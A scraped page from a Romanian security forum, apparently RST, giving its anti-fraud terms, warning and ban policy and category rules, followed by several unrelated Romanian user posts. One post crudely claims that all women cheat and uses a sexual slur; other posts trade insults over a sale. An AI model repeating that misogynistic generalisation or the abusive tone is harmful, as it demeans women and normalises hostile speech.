rdp-uri etc. care nu va apartin - Nu se accepta conturi sau acces la diferite servicii care nu va apartin RST Market - Nu se accepta vanzarea, cumpararea sau schimbul de date care faciliteteaza frauda online sau bancara - Nu se accepta vanzarea, cumpararea sau schimbul de root-uri, smtp-uri, vps-uri, rdp-uri etc. care nu va apartin - Nu se accepta vanzarea, cumpararea sau schimbul de conturi care nu va apartin [EN] Terms and conditions - The administrators of this website do not take any responsibility for the content of the website! Each user is responsible for the created content! - The administrators are not responsible on any problem resulted by using the information available on this website! - The administrators of this website do not take any responsibility for the loss resulted by selling, buying or exchanging information on this website! - We do no tolerate fraud or any information that facilitates online fraud or banking fraud, including by private messaging system (skimming, CCs, roots etc.)! Any abuse on this rule is punished with permanent ban on this website and your personal data will be offered to the authorities if they request us this. Also, the administrators of this forum are allowed to ban users for any activity that can be related to online fraud or banking fraud. - It is not permitted to create illegal content or without copyright! It is forbidden to publish private personal date, stolen accounts, access information to different websites or services that do not belong to you or any information that does not respect the legislation! - This website does not host files without copyright, it only hosts links to external service providers. The administrators of this website do not take the responsibility for the content available on external services. If you are the copyright folder for information provided on the website, please contact one of the administrators to remove the content. - By accessing this website you agree the terms and conditions and the rules of this website! [EN] Warnings, temporary and permanent ban reasons Not following the forum rules may result in warnings, temporary ban or permanent ban on this website. The administrators and the moderators of this website decide the punishment for each abuse of the rules. If you consider that the punishment is not correct, please contact one of the administrators of this website. You can be warned for the following actions: - Off-topic - if you deviate from the topic subject - Double post - If you have multiple consecutive posts - Useless post - If you post without any reason and the post is not useful to the topic subject - Reopen thread - Check the last post date on a thread and do not post there if it is very old - Insulted member - Do not attack and insult other members - Improper name - Please use descriptive thread subjects - Improper language - You are not on IRC, please be as correctly grammatical as possible - Referral links - Do not post adf.ly or other stupid referral links - Creating an account on the forum only to ask for invitations on trackers, other forums, etc. - Other - Any other abuse of the forum rules For multiple warnings, the result can be temporary or permanent ban: - for 3 warnings - ban 5 days - for 4 warnings - ban 30 days - for 5 warnings - permanent ban [EN] Rules 1. Do not post or request root, vps, smtp or anything else. 2. Specify the original sources for your posts when you post a tool or a tutorial from other website. 3. Some categories (such as Free stuff or RST Market) have internal rules. Follow that rules when you post in that categories. 4. Each tool or tutorial must contain at least a small description in English or Romanian. Links to programs must be links to the official site of those programs. 5. Publishing or trying to publish private personal information will result in permanent ban. 6. Do not request VIP or Moderator access, you will not get it. If we need you, we will search you. 7. A moderator or an administrator have the right to ban anyone on this forum if he considers that the user is useless for the forum. 8. There is a "Report" button, please use it, do not post to warn other users about their mistake. 9. You are not allowed to create tools or write articles in the name of RST without the approval of one of the administrators. 10. You are not allowed to attack or insult other persons on that chat and on the forum. 11. If you have more than one account you can be banned on all your accounts. 12. Posting vulnerabilities i websites that do not have a bug bounty program is forbidden. RST staff have the right to modify at any time the Terms and conditions and the rules of this forum without a notification. [EN] Category rules Free stuff: - It is forbidden to post or request root, vps, smtp or anything else that do not belong to you - It is forbidden to post accounts for different websites or services that do not belong to you RST Market: - It is forbidden to sell, buy or exchange data that facilitates online fraud or banking fraud - It is forbidden to sell, buy or exchange roots, vps, smtp, rdp or anything else that do not belong to you - It is forbidden to sell, buy or exchange accounts that do not belong to you

De-aia imi e frica sa ma insor. Daca nu te-a inselat femeia,inseamna ca ori n-a avut ocazia,ori inca n-ai aflat,ca-n rest sunt toate la fel futule-n gat de japite.

Salut, eu ti-am prezentat optiunea mea, nu iti convine treci mai departe. Acest lucru este valabil pentru toti, este o treaba de o ora, iar cine este pasionat de asa ceva poate face acest lucru mult mai repede. PS* Incercam sa ne pastram calmul si sa nu sarim in cap cu "Ce putin ofera asta...", nu va convine treceti peste si atat, asta este oferta mea eu va respect pe voi iar voi la randul vostru ar trebui sa faceti acelas lucru, sunt sigur ca daca ati avea o afacere online incercati sa scoateti cat mai mult profit. #OnTopic Zi faina! Astept in continuare PM de la cei interesati.

Raspunsul tau nu este pe subiect, nici macar nu am vorbit cu tine pana acum. De unde stii tu ca tie iti ceream 1 euro si nu 0.5 Stai jos, nu te-a bagat nimeni in seama.

Esti spart omule, ti-am dat de inteles ca nu ma intereseaza ceea ce zici, ce te mai complici. UP*

Man, stai usor ca nu ne cunoastem, hai sa nu ne injuram cand putem folosi un limbaj diplomant. Singurul sclav dupa limbaj de aici esti doar tu. Te mai si superi ca te cumpar cu mai mult de cat ai fost vandut de parintii tai.

Delete